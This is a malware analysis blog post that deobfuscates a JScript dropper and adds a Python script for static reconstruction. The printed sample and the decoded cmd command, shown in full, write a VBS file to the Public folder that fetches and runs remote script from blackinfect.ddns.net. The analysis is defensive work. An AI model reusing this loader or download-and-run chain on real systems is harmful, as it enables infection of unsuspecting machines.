var output0 = Bfnq6M43("\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74");
var output1 = Bfnq6M43("\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C");
var output2 = Bfnq6M43("\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E");
var output3 = Bfnq6M43("\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40
\x40\x2F\x40\x62\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73");
var output4 = Bfnq6M43("\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70");
var output5 = Bfnq6M43("\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29");
var output6 = Bfnq6M43("\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73");

console.log("Obfuscated 1 = " + output1);

console.log("Obfuscated 2 = " + output2);
console.log("Obfuscated 3 = " + output3);
console.log("Obfuscated 4 = " + output4);
console.log("Obfuscated 5 = " + output5);
console.log("Obfuscated 6 = " + output6);

function Bfnq6M43(VSxEf79) {
  var roQ54 = new RegExp('@', 'g');
  var AA7ldSL23 = VSxEf79.replace(roQ54, '');
  return AA7ldSL23;
}

When executed this returns the following output:

Obfuscated 1 = WScript.Shell

Obfuscated 2 = run

Obfuscated 3 = cmd /V/D/c echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs&echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs

Obfuscated 4 = Popup

Obfuscated 5 = Error (cod %srand%)

Obfuscated 6 = cmd /V/D/c start %public%\\SKz4836.vbs

If we now replace the calls to the function with the decoded strings, we get a better view of what is going on:

function Vw3eX8X29(){
    var _$_N7nuQ8464=["\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74",
        "\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C",
        "\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E",
        "\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40\x40\x2F\x40\x6
2\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73",
        "\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70",
        "\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29",
        "\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73"]

    var yEiZU47 = new ActiveXObject("WScript.Shell"); //Bfnq6M43(_$_N7nuQ8464[1])
    yEiZU47["run"](
        "cmd /V/D/c echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs&echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs",
        0); //Bfnq6M43(_$_N7nuQ8464[2])    //Bfnq6M43(_$_N7nuQ8464[3])

}

Now we can clearly see how the code tries to execute a cmd command.

Now we have to understand what this cmd command is doing.

"cmd /V/D/c echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs&echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs"
  1. cmd /V /D /c: This starts a new Command Prompt process with specific options. /V enables delayed variable expansion, /D disables execution of AutoRun commands from the registry, and /c carries out the command specified by the string.

  2. echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^">%public%\\SKz4836.vbs: This writes the first fragment of the VBS script to SKz4836.vbs in the %public% folder. Piping echo into set /p= prints the quoted text without a trailing newline. The fragment contains the variable assignments and ends with GetO, the first half of a GetObject call.

  3. echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^">>%public%\\SKz4836.vbs: This appends the remaining text to the same file. It completes the GetObject call, whose argument is a URL assembled from string literals and the variables defined above.

  4. c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\SKz4836.vbs: Finally, this executes the newly created VBS script using the start command.

Basically, the command creates a VBScript file at C:\Users\Public\SKz4836.vbs and then executes it.

If we execute the part of the command that creates the script, the file generated looks like the following.

AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetObject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")

If we beautify it a bit we get the following:

AmhcpR61 = "."
gKFP039 = "i"
MYUnOk96 = "g"
Glv80 = ":"
GetObject("sCr" + gKFP039 + "pt" + Glv80 + "hT" + "Tps" + Glv80 + "//blackinfect" + AmhcpR61 + "ddns" + AmhcpR61 + "net//" + MYUnOk96 + "1")

Now let's replace the variable names with the actual strings they store.

GetObject("sCr" + "i" + "pt" + ":" + "hT" + "Tps" + ":" + 
"//blackinfect" + "." + "ddns" + "." + "net//" + "g" + "1")

The code will try to retrieve whatever the following URL points to:

https://blackinfect.ddns.net//g1

The URL is not available and if we try to access it we get an error.
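The reconstruction walked through above can be replayed offline without running the sample. The following is an added example, not code from the original post: it rebuilds the dropped file from the two echo|set /p writes and folds the GetObject concatenation into one string. The function names are hypothetical and the command string is copied from the page.

```python
import re
from urllib.parse import urlsplit

# Command string copied from the page (JavaScript-escaped backslashes kept as shown).
CMD = (r'cmd /V/D/c echo|set /p=^"AmhcpR61=".":gKFP039="i":MYUnOk96="g":Glv80=":":GetO^"'
       r'>%public%\\SKz4836.vbs&echo|set /p=^"bject("sCr"+gKFP039+"pt"+Glv80+"hT"+"Tps"'
       r'+Glv80+"//blackinfect"+AmhcpR61+"ddns"+AmhcpR61+"net//"+MYUnOk96+"1")^"'
       r'>>%public%\\SKz4836.vbs&c:\\windows\\system32\\cmd.exe /c start '
       r'C:\\Users\\Public\\SKz4836.vbs')

# One write: echo|set /p=^"TEXT^" followed by > (overwrite) or >> (append) and a path.
WRITE = re.compile(r'echo\|set /p=\^"(.*?)\^"(>>?)([^&]+)')

def rebuild_dropped_files(cmd):
    """Replay each echo|set /p write as text only; nothing is executed.
    set /p prints its prompt with no trailing newline, so the fragments join up."""
    files = {}
    for text, redirect, path in WRITE.findall(cmd):
        key = path.strip().lower()
        files[key] = (files.get(key, "") if redirect == ">>" else "") + text
    return files

def resolve_getobject(vbs):
    """Fold the string concatenation passed to GetObject into one literal."""
    call = re.search(r'GetObject\((.*)\)', vbs, re.I)
    if call is None:
        return None
    # VBScript identifiers are case-insensitive, so normalise the names.
    names = {n.lower(): v for n, v in re.findall(r'(\w+)="([^"]*)"', vbs[:call.start()])}
    parts = []
    for literal, name in re.findall(r'"([^"]*)"|(\w+)', call.group(1)):
        # A bare identifier must have been assigned earlier; KeyError otherwise.
        parts.append(names[name.lower()] if name else literal)
    return "".join(parts)

def analyse(cmd=CMD):
    """Map each dropped path to its script text, resolved string, prefix and host."""
    report = {}
    for path, vbs in rebuild_dropped_files(cmd).items():
        target = resolve_getobject(vbs) or ""
        # The text before the first ':' is the prefix in front of the URL.
        moniker, _, url = target.partition(":")
        report[path] = {"vbs": vbs, "target": target,
                        "moniker": moniker.lower(), "host": urlsplit(url).hostname}
    return report

if __name__ == "__main__":
    for path, info in analyse().items():
        print(path, info["target"], info["host"], sep="\n  ")
```

Running it prints the dropped path, the resolved string sCript:hTTps://blackinfect.ddns.net//g1, and the host name, which can go straight into a blocklist or a proxy and DNS log search.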

Recap

We can now see what the "malware" does: we know it tried to obfuscate what it was doing, and we know it is trying to retrieve an object from the URL https://blackinfect.ddns.net//g1. I don't know what the malware intends to do with the downloaded object, and I was not able to access the URL. I also don't know why the HTML code added all those hidden paragraphs with random characters. My first thought was that it would use those strings later in the object that it tries to download, but I can't know for sure. I also did not find any code trying to execute the downloaded object.

While the script might not have any impact on the system, since the file it is trying to download is not available and there is no code to execute the file in case it manages to download it, it is clear the script had malicious intentions. The amount of obfuscation and the objects it was trying to obfuscate clearly show some monkey business.

💡
If you find something that is wrong or incomplete, please feel free to comment or contact me and I will correct it!

Joan E.S

Hi, I am Joan Esteban Santaeularia, a Cybersecurity Engineer. Currently focusing on Web3 security and reverse engineering. I am also a music producer focused on Techno and House.